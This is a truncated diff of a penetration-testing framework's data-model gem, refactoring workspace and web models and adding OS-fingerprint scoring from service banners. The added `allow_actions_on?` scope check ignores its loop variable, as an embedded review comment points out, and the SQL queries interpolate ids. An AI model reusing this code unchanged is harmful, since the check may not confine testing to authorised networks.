a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb @@ -1,9 +1,16 @@ -module MetasploitDataModels::ActiveRecordModels::WebPage - def self.included(base) - base.class_eval{ - belongs_to :web_site, :class_name => "Mdm::WebSite" - serialize :headers, ::MetasploitDataModels::Base64Serializer.new - } - end +class Mdm::WebPage < ActiveRecord::Base + # + # Relations + # + + belongs_to :web_site, :class_name => 'Mdm::WebSite' + + # + # Serializations + # + + serialize :headers, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_web_page, self) end 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb index 9cc8296ec8..a99750ae2a 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb 
@@ -1,41 +1,47 @@ -module MetasploitDataModels::ActiveRecordModels::WebSite - def self.included(base) - base.class_eval { - belongs_to :service, :class_name => "Mdm::Service", :foreign_key => "service_id" - has_many :web_pages, :dependent => :destroy, :class_name => "Mdm::WebPage" - has_many :web_forms, :dependent => :destroy, :class_name => "Mdm::WebForm" - has_many :web_vulns, :dependent => :destroy, :class_name => "Mdm::WebVuln" +class Mdm::WebSite < ActiveRecord::Base + # + # Relations + # - serialize :options, ::MetasploitDataModels::Base64Serializer.new + belongs_to :service, :class_name => 'Mdm::Service', :foreign_key => 'service_id' + has_many :web_forms, :dependent => :destroy, :class_name => 'Mdm::WebForm' + has_many :web_pages, :dependent => :destroy, :class_name => 'Mdm::WebPage' + has_many :web_vulns, :dependent => :destroy, :class_name => 'Mdm::WebVuln' - def to_url(ignore_vhost=false) - proto = self.service.name == "https" ? "https" : "http" - host = ignore_vhost ? self.service.host.address : self.vhost - port = self.service.port + # + # Serializations + # - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" - end + serialize :options, ::MetasploitDataModels::Base64Serializer.new - url = "#{proto}://#{host}" - if not ((proto == "http" and port == 80) or (proto == "https" and port == 443)) - url += ":#{port}" - end - url - end - - def page_count - web_pages.size - end - - def form_count - web_forms.size - end - - def vuln_count - web_vulns.size - end - } # end class_eval block + def form_count + web_forms.size end + + def page_count + web_pages.size + end + + def to_url(ignore_vhost=false) + proto = self.service.name == "https" ? "https" : "http" + host = ignore_vhost ? 
self.service.host.address : self.vhost + port = self.service.port + + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + url = "#{proto}://#{host}" + if not ((proto == "http" and port == 80) or (proto == "https" and port == 443)) + url += ":#{port}" + end + url + end + + def vuln_count + web_vulns.size + end + + ActiveSupport.run_load_hooks(:mdm_web_site, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb index c826b892ea..3d938d3ef9 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb @@ -1,9 +1,16 @@ -module MetasploitDataModels::ActiveRecordModels::WebVuln - def self.included(base) - base.class_eval{ - belongs_to :web_site, :class_name => "Mdm::WebSite" - serialize :params, ::MetasploitDataModels::Base64Serializer.new - } - end +class Mdm::WebVuln < ActiveRecord::Base + # + # Relations + # + + belongs_to :web_site, :class_name => 'Mdm::WebSite' + + # + # Serializations + # + + serialize :params, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_web_vuln, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb index bfaabcae53..1b03ab6c99 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb @@ -1,6 +1,3 @@ -module MetasploitDataModels::ActiveRecordModels::WmapRequest - def self.included(base) - base.class_eval{ - } - end +class Mdm::WmapRequest < ActiveRecord::Base + ActiveSupport.run_load_hooks(:mdm_wmap_request, self) end 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb
index 71cc1e3ab0..1ba8ed2e57 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb
@@ -1,6 +1,3 @@
-module MetasploitDataModels::ActiveRecordModels::WmapTarget
- def self.included(base)
- base.class_eval{
- }
- end
+class Mdm::WmapTarget < ActiveRecord::Base
+ ActiveSupport.run_load_hooks(:mdm_wmap_target, self)
 end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb
index c3aab6b9c2..8105105ee0 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb
@@ -1,184 +1,197 @@ -# NOTE: this AR model is called "Project" on the Pro side +class Mdm::Workspace < ActiveRecord::Base + # + # Callbacks + # -module MetasploitDataModels::ActiveRecordModels::Workspace - def self.included(base) - base.class_eval{ + before_save :normalize - # Usage of the evil eval avoids dynamic constant assignment - # exception when this module is included - eval('DEFAULT = "default"') unless defined? DEFAULT + # + # CONSTANTS + # - has_many :hosts, :dependent => :destroy, :class_name => "Mdm::Host" - has_many :services, :through => :hosts, :class_name => "Mdm::Service", :foreign_key => "service_id" - has_many :notes, :class_name => "Mdm::Note" - has_many :loots, :through => :hosts, :class_name => "Mdm::Loot" - has_many :events, :class_name => "Mdm::Event" - has_many :reports, :dependent => :destroy, :class_name => "Mdm::Report" - has_many :report_templates, :dependent => :destroy, :class_name => "Mdm::ReportTemplate" - has_many :tasks, :dependent => :destroy, :class_name => "Mdm::Task", :order => "created_at DESC" - has_many :clients, :through => :hosts, :class_name => "Mdm::Client" - has_many :vulns, :through => :hosts, :class_name => "Mdm::Vuln" - has_many :creds, :through => :services, :class_name => "Mdm::Cred" - has_many :imported_creds, :dependent => :destroy, :class_name => "Mdm::ImportedCred" - has_many :exploited_hosts, :through => :hosts, :class_name => "Mdm::ExploitedHost" - has_many :sessions, :through => :hosts, :class_name => "Mdm::Session" - has_many :cred_files, :dependent => :destroy, :class_name => "Mdm::CredFile" - has_many :listeners, :dependent => :destroy, :class_name => "Mdm::Listener" - belongs_to :owner, :class_name => "Mdm::User", :foreign_key => "owner_id" - has_and_belongs_to_many :users, :join_table => "workspace_members", :uniq => true, :class_name => "Mdm::User" + DEFAULT = 'default' - before_save :normalize + # + # Relations + # - validates :name, :presence => true, :uniqueness => true, :length => {:maximum => 
255} - validates :description, :length => {:maximum => 4096} - validate :boundary_must_be_ip_range + has_many :cred_files, :dependent => :destroy, :class_name => 'Mdm::CredFile' + has_many :creds, :through => :services, :class_name => 'Mdm::Cred' + has_many :events, :class_name => 'Mdm::Event' + has_many :hosts, :dependent => :destroy, :class_name => 'Mdm::Host' + has_many :imported_creds, :dependent => :destroy, :class_name => 'Mdm::ImportedCred' + has_many :listeners, :dependent => :destroy, :class_name => 'Mdm::Listener' + has_many :notes, :class_name => 'Mdm::Note' + belongs_to :owner, :class_name => 'Mdm::User', :foreign_key => 'owner_id' + has_many :report_templates, :dependent => :destroy, :class_name => 'Mdm::ReportTemplate' + has_many :reports, :dependent => :destroy, :class_name => 'Mdm::Report' + has_many :tasks, :dependent => :destroy, :class_name => 'Mdm::Task', :order => 'created_at DESC' + has_and_belongs_to_many :users, :join_table => 'workspace_members', :uniq => true, :class_name => 'Mdm::User' - def web_sites - query = <<-EOQ - SELECT DISTINCT web_sites.* - FROM hosts, services, web_sites - WHERE hosts.workspace_id = #{id} AND + # + # Through :hosts + # + has_many :clients, :through => :hosts, :class_name => 'Mdm::Client' + has_many :exploited_hosts, :through => :hosts, :class_name => 'Mdm::ExploitedHost' + has_many :loots, :through => :hosts, :class_name => 'Mdm::Loot' + has_many :vulns, :through => :hosts, :class_name => 'Mdm::Vuln' + has_many :services, :through => :hosts, :class_name => 'Mdm::Service', :foreign_key => 'service_id' + has_many :sessions, :through => :hosts, :class_name => 'Mdm::Session' + + # + # Validations + # + + validates :name, :presence => true, :uniqueness => true, :length => {:maximum => 255} + validates :description, :length => {:maximum => 4096} + validate :boundary_must_be_ip_range + + # + # If limit_to_network is disabled, this will always return true. 
+ # Otherwise, return true only if all of the given IPs are within the project + # boundaries. + # + def allow_actions_on?(ips) + return true unless limit_to_network + return true unless boundary + return true if boundary.empty? + boundaries = Shellwords.split(boundary) + return true if boundaries.empty? # It's okay if there is no boundary range after all + given_range = Rex::Socket::RangeWalker.new(ips) + return false unless given_range # Can't do things to nonexistant IPs + allowed = false + boundaries.each do |boundary_range| + ok_range = Rex::Socket::RangeWalker.new(boundary) + allowed = true if ok_range.include_range? given_range + end + return allowed + end + + def boundary_must_be_ip_range + errors.add(:boundary, "must be a valid IP range") unless valid_ip_or_range?(boundary) + end + + def creds + Mdm::Cred.find( + :all, + :include => {:service => :host}, + :conditions => ["hosts.workspace_id = ?", self.id] + ) + end + + def self.default + find_or_create_by_name(DEFAULT) + end + + def default? + name == DEFAULT + end + + # + # This method iterates the creds table calling the supplied block with the + # cred instance of each entry. 
+ # + def each_cred(&block) + creds.each do |cred| + block.call(cred) + end + end + + def each_host_tag(&block) + host_tags.each do |host_tag| + block.call(host_tag) + end + end + + def host_tags + Mdm::Tag.find( + :all, + :include => :hosts, + :conditions => ["hosts.workspace_id = ?", self.id] + ) + end + + def web_forms + query = <<-EOQ + SELECT DISTINCT web_forms.* + FROM hosts, services, web_sites, web_forms + WHERE hosts.workspace_id = #{id} AND services.host_id = hosts.id AND - web_sites.service_id = services.id - EOQ - Mdm::WebSite.find_by_sql(query) - end + web_sites.service_id = services.id AND + web_forms.web_site_id = web_sites.id + EOQ + Mdm::WebForm.find_by_sql(query) + end - def web_pages - query = <<-EOQ + def web_pages + query = <<-EOQ SELECT DISTINCT web_pages.* FROM hosts, services, web_sites, web_pages WHERE hosts.workspace_id = #{id} AND services.host_id = hosts.id AND web_sites.service_id = services.id AND web_pages.web_site_id = web_sites.id - EOQ - Mdm::WebPage.find_by_sql(query) - end + EOQ + Mdm::WebPage.find_by_sql(query) + end - def web_forms - query = <<-EOQ - SELECT DISTINCT web_forms.* - FROM hosts, services, web_sites, web_forms - WHERE hosts.workspace_id = #{id} AND - services.host_id = hosts.id AND - web_sites.service_id = services.id AND - web_forms.web_site_id = web_sites.id - EOQ - Mdm::WebForm.find_by_sql(query) - end + def web_sites + query = <<-EOQ + SELECT DISTINCT web_sites.* + FROM hosts, services, web_sites + WHERE hosts.workspace_id = #{id} AND + services.host_id = hosts.id AND + web_sites.service_id = services.id + EOQ + Mdm::WebSite.find_by_sql(query) + end - def unique_web_forms - query = <<-EOQ + def web_vulns + query = <<-EOQ + SELECT DISTINCT web_vulns.* + FROM hosts, services, web_sites, web_vulns + WHERE hosts.workspace_id = #{id} AND + services.host_id = hosts.id AND + web_sites.service_id = services.id AND + web_vulns.web_site_id = web_sites.id + EOQ + Mdm::WebVuln.find_by_sql(query) + end + + def 
unique_web_forms + query = <<-EOQ SELECT DISTINCT web_forms.web_site_id, web_forms.path, web_forms.method, web_forms.query FROM hosts, services, web_sites, web_forms WHERE hosts.workspace_id = #{id} AND services.host_id = hosts.id AND web_sites.service_id = services.id AND web_forms.web_site_id = web_sites.id - EOQ - Mdm::WebForm.find_by_sql(query) - end - - def web_vulns - query = <<-EOQ - SELECT DISTINCT web_vulns.* - FROM hosts, services, web_sites, web_vulns - WHERE hosts.workspace_id = #{id} AND - services.host_id = hosts.id AND - web_sites.service_id = services.id AND - web_vulns.web_site_id = web_sites.id - EOQ - Mdm::WebVuln.find_by_sql(query) - end - - def self.default - find_or_create_by_name(DEFAULT) - end - - def default? - name == DEFAULT - end - - def creds - Mdm::Cred.find( - :all, - :include => {:service => :host}, - :conditions => ["hosts.workspace_id = ?", self.id] - ) - end - - def host_tags - Mdm::Tag.find( - :all, - :include => :hosts, - :conditions => ["hosts.workspace_id = ?", self.id] - ) - end - - # - # This method iterates the creds table calling the supplied block with the - # cred instance of each entry. - # - def each_cred(&block) - creds.each do |cred| - block.call(cred) - end - end - - def each_host_tag(&block) - host_tags.each do |host_tag| - block.call(host_tag) - end - end - - def web_unique_forms(addrs=nil) - forms = unique_web_forms - if addrs - forms.reject!{|f| not addrs.include?( f.web_site.service.host.address ) } - end - forms - end - - def boundary_must_be_ip_range - errors.add(:boundary, "must be a valid IP range") unless valid_ip_or_range?(boundary) - end - - # - # If limit_to_network is disabled, this will always return true. - # Otherwise, return true only if all of the given IPs are within the project - # boundaries. - # - def allow_actions_on?(ips) - return true unless limit_to_network - return true unless boundary - return true if boundary.empty? 
- boundaries = Shellwords.split(boundary) - return true if boundaries.empty? # It's okay if there is no boundary range after all - given_range = Rex::Socket::RangeWalker.new(ips) - return false unless given_range # Can't do things to nonexistant IPs - allowed = false - boundaries.each do |boundary_range| - ok_range = Rex::Socket::RangeWalker.new(boundary) - allowed = true if ok_range.include_range? given_range - end - return allowed - end - - private - def valid_ip_or_range?(string) - begin - Rex::Socket::RangeWalker.new(string) - rescue - return false - end - end - - def normalize - boundary.strip! if boundary - end - - } # end class_eval block + EOQ + Mdm::WebForm.find_by_sql(query) end + + def web_unique_forms(addrs=nil) + forms = unique_web_forms + if addrs + forms.reject!{|f| not addrs.include?( f.web_site.service.host.address ) } + end + forms + end + + private + + def normalize + boundary.strip! if boundary + end + + def valid_ip_or_range?(string) + begin + Rex::Socket::RangeWalker.new(string) + rescue + return false + end + end + + ActiveSupport.run_load_hooks(:mdm_workspace, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console index 357ab09ec4..89fd18a533 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console @@ -54,9 +54,7 @@ begin exit end - include MetasploitDataModels - MetasploitDataModels.create_and_load_ar_classes - + MetasploitDataModels.require_models puts "\n\n\n#{mdm_banner[:color]}#{mdm_banner[:text]}\e[0m\n\n\n" diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb new file mode 100644 index 0000000000..cebbdf298e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb 
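Review bot: In `allow_actions_on?` the loop over `boundaries` never uses its block variable: `Rex::Socket::RangeWalker.new(boundary)` is built from the whole boundary string on every iteration, so `ok_range.include_range? given_range` is not evaluated per range. This method is what restricts actions to the project network, so the line should read `ok_range = Rex::Socket::RangeWalker.new(boundary_range)`. `return false unless given_range` can never fire because `new` does not return nil, and `valid_ip_or_range?` returns the walker object rather than a boolean, so it only rejects input if the constructor raises; if `RangeWalker` offers a validity predicate (not visible here), both places should test that. The `#{id}` interpolation in the `web_*` SQL heredocs could use bind parameters, as `creds` and `host_tags` already do.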
@@ -0,0 +1,12 @@
+# Namespace for models
+module Mdm
+ # Causes the model_name for all Mdm modules to not include the Mdm:: prefix in their name.
+ #
+ # This has been supported since ActiveSupport 3.2.1. In ActiveSupport 3.1.0, it checked for _railtie. Before that
+ # there was no way to do relative naming without manually overriding model_name in each class.
+ #
+ # @return [true]
+ def self.use_relative_model_naming?
+ true
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb
new file mode 100644
index 0000000000..be5710f3c6
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb
@@ -0,0 +1,984 @@ +module Mdm::Host::OperatingSystemNormalization + # + # Normalize the operating system fingerprints provided by various scanners + # (nmap, nexpose, retina, nessus, etc). + # + # These are stored as notes (instead of directly in the os_* fields) + # specifically for this purpose. + # + def normalize_os + host = self + + wname = {} # os_name == Linux, Windows, Mac OS X, VxWorks + wtype = {} # purpose == server, client, device + wflav = {} # os_flavor == Ubuntu, Debian, 2003, 10.5, JetDirect + wvers = {} # os_sp == 9.10, SP2, 10.5.3, 3.05 + warch = {} # arch == x86, PPC, SPARC, MIPS, '' + wlang = {} # os_lang == English, '' + whost = {} # hostname + + # Note that we're already restricting the query to this host by using + # host.notes instead of Note, so don't need a host_id in the + # conditions. + fingerprintable_notes = self.notes.where("ntype like '%%fingerprint'") + fingerprintable_notes.each do |fp| + next if not validate_fingerprint_data(fp) + norm = normalize_scanner_fp(fp) + wvers[norm[:os_sp]] = wvers[norm[:os_sp]].to_i + (100 * norm[:certainty]) + wname[norm[:os_name]] = wname[norm[:os_name]].to_i + (100 * norm[:certainty]) + wflav[norm[:os_flavor]] = wflav[norm[:os_flavor]].to_i + (100 * norm[:certainty]) + warch[norm[:arch]] = warch[norm[:arch]].to_i + (100 * norm[:certainty]) + whost[norm[:name]] = whost[norm[:name]].to_i + (100 * norm[:certainty]) + wtype[norm[:type]] = wtype[norm[:type]].to_i + (100 * norm[:certainty]) + end + + # Grab service information and assign scores. Some services are + # more trustworthy than others. If more services agree than not, + # than that should be considered as well. + # Each service has a starting number of points. Services that + # are more difficult to fake are awarded more points. The points + # represent a running total, not a fixed score. + # XXX: This needs to be refactored in a big way. 
Tie-breaking is + # pretty arbitrary, it would be nice to explicitly believe some + # services over others, but that means recording which service + # has an opinion and which doesn't. It would also be nice to + # identify "impossible" combinations of services and alert that + # something funny is going on. + # XXX: This hack solves the memory leak generated by self.services.each {} + fingerprintable_services = self.services.where("name is not null and name != '' and info is not null and info != ''") + fingerprintable_services.each do |s| + points = 0 + case s.name + when 'smb' + points = 210 + case s.info + when /\.el([23456])(\s+|$)/ # Match Samba 3.0.33-0.30.el4 as RHEL4 + wname['Linux'] = wname['Linux'].to_i + points + wflav["RHEL" + $1] = wflav["RHEL" + $1].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /(ubuntu|debian|fedora|red ?hat|rhel)/i + wname['Linux'] = wname['Linux'].to_i + points + wflav[$1.capitalize] = wflav[$1.capitalize].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /^Windows/ + win_sp = nil + win_flav = nil + win_lang = nil + + ninfo = s.info + ninfo.gsub!('(R)', '') + ninfo.gsub!('(TM)', '') + ninfo.gsub!(/\s+/, ' ') + ninfo.gsub!('No Service Pack', 'Service Pack 0') + + # Windows (R) Web Server 2008 6001 Service Pack 1 (language: Unknown) (name:PG-WIN2008WEB) (domain:WORKGROUP) + # Windows XP Service Pack 3 (language: English) (name:EGYPT-B3E55BF3C) (domain:EGYPT-B3E55BF3C) + # Windows 7 Ultimate (Build 7600) (language: Unknown) (name:WIN7) (domain:WORKGROUP) + # Windows 2003 No Service Pack (language: Unknown) (name:VMWIN2003) (domain:PWNME) + + #if ninfo =~ /^Windows ([^\s]+)(.*)(Service Pack |\(Build )([^\(]+)\(/ + if ninfo =~ /^Windows (.*)(Service Pack [^\s]+|\(Build [^\)]+\))/ + win_flav = $1.strip + win_sp = ($2).strip + win_sp.gsub!(/with.*/, '') + win_sp.gsub!('Service Pack', 'SP') + win_sp.gsub!('Build', 'b') + win_sp.gsub!(/\s+/, '') + win_sp.tr!("()", '') + else + if ninfo =~ 
/^Windows ([^\s+]+)([^\(]+)\(/ + win_flav = $2.strip + end + end + + + if ninfo =~ /name: ([^\)]+)\)/ + hostname = $1.strip + end + + if ninfo =~ /language: ([^\)]+)\)/ + win_lang = $1.strip + end + + win_lang = nil if win_lang =~ /unknown/i + win_vers = win_sp + + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + wlang[win_lang] = wlang[win_lang].to_i + points if win_lang + wflav[win_flav] = wflav[win_flav].to_i + points if win_flav + wvers[win_vers] = wvers[win_vers].to_i + points if win_vers + whost[hostname] = whost[hostname].to_i + points if hostname + + case win_flav + when /NT|2003|2008/ + win_type = 'server' + else + win_type = 'client' + end + wtype[win_type] = wtype[win_type].to_i + points + end + + when 'ssh' + points = 104 + case s.info + when /honeypot/i # Never trust this + nil + when /ubuntu/i + # This needs to be above /debian/ becuase the ubuntu banner contains both, e.g.: + # SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6 + wname['Linux'] = wname['Linux'].to_i + points + wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /debian/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Debian'] = wflav['Debian'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /FreeBSD/ + wname['FreeBSD'] = wname['FreeBSD'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /sun_ssh/i + wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /vshell|remotelyanywhere|freessh/i + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /radware/i + wname['RadWare'] = wname['RadWare'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /dropbear/i + wname['Linux'] = wname['Linux'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /netscreen/i + wname['NetScreen'] = 
wname['NetScreen'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /vpn3/ + wname['Cisco VPN 3000'] = wname['Cisco VPN 3000'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /cisco/i + wname['Cisco IOS'] = wname['Cisco IOS'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /mpSSH/ + wname['HP iLO'] = wname['HP iLO'].to_i + points + wtype['server'] = wtype['server'].to_i + points + end + when 'http' + points = 99 + case s.info + when /iSeries/ + wname['IBM iSeries'] = wname['IBM iSeries'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Mandrake/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Mandrake'] = wflav['Mandrake'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Mandriva/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Mandrake'] = wflav['Mandrake'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Ubuntu/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Debian/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Debian'] = wflav['Debian'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Fedora/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Fedora'] = wflav['Fedora'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /CentOS/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['CentOS'] = wflav['CentOS'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /RHEL/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['RHEL'] = wflav['RHEL'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Red.?Hat/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Red Hat'] = wflav['Red Hat'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /SuSE/i + 
wname['Linux'] = wname['Linux'].to_i + points + wflav['SUSE'] = wflav['SUSE'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /TurboLinux/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['TurboLinux'] = wflav['TurboLinux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Gentoo/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Gentoo'] = wflav['Gentoo'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Conectiva/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Conectiva'] = wflav['Conectiva'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Asianux/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Asianux'] = wflav['Asianux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Trustix/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Trustix'] = wflav['Trustix'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /White Box/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['White Box'] = wflav['White Box'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /UnitedLinux/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['UnitedLinux'] = wflav['UnitedLinux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /PLD\/Linux/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['PLD/Linux'] = wflav['PLD/Linux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Vine\/Linux/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['Vine/Linux'] = wflav['Vine/Linux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /rPath/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['rPath'] = wflav['rPath'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /StartCom/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['StartCom'] = wflav['StartCom'].to_i + points 
+ wtype['server'] = wtype['server'].to_i + points + + when /linux/i + wname['Linux'] = wname['Linux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /PalmOS/ + wname['PalmOS'] = wname['PalmOS'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/[234]\.0/ + wname['Microsoft Windows NT 4.0'] = wname['Microsoft Windows NT 4.0'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/5\.0/ + wname['Microsoft Windows 2000'] = wname['Microsoft Windows 2000'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/5\.1/ + wname['Microsoft Windows XP'] = wname['Microsoft Windows XP'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/6\.0/ + wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/7\.0/ + wname['Microsoft Windows 2008'] = wname['Microsoft Windows 2008'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Win32/i + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /DD\-WRT ([^\s]+) /i + wname['Linux'] = wname['Linux'].to_i + points + wflav['DD-WRT'] = wflav['DD-WRT'].to_i + points + wvers[$1.strip] = wvers[$1.strip].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Darwin/ + wname['Apple Mac OS X'] = wname['Apple Mac OS X'].to_i + points + + when /FreeBSD/i + wname['FreeBSD'] = wname['FreeBSD'].to_i + points + + when /OpenBSD/i + wname['OpenBSD'] = wname['OpenBSD'].to_i + points + + when /NetBSD/i + wname['NetBSD'] = wname['NetBSD'].to_i + points + + when /NetWare/i + wname['Novell NetWare'] = wname['Novell NetWare'].to_i + points + + when /OpenVMS/i + wname['OpenVMS'] = wname['OpenVMS'].to_i + points + + when /SunOS|Solaris/i + 
wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points + + when /HP.?UX/i + wname['HP-UX'] = wname['HP-UX'].to_i + points + end + when 'snmp' + points = 103 + case s.info + when /^Sun SNMP Agent/ + wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^SunOS ([^\s]+) ([^\s]+) / + # XXX 1/2 XXX what does this comment mean i wonder + wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Linux ([^\s]+) ([^\s]+) / + whost[$1] = whost[$1].to_i + points + wname['Linux ' + $2] = wname['Linux ' + $2].to_i + points + wvers[$2] = wvers[$2].to_i + points + arch = get_arch_from_string(s.info) + warch[arch] = warch[arch].to_i + points if arch + wtype['server'] = wtype['server'].to_i + points + + when /^Novell NetWare ([^\s]+)/ + wname['Novell NetWare ' + $1] = wname['Novell NetWare ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + arch = "x86" + warch[arch] = warch[arch].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Novell UnixWare ([^\s]+)/ + wname['Novell UnixWare ' + $1] = wname['Novell UnixWare ' + 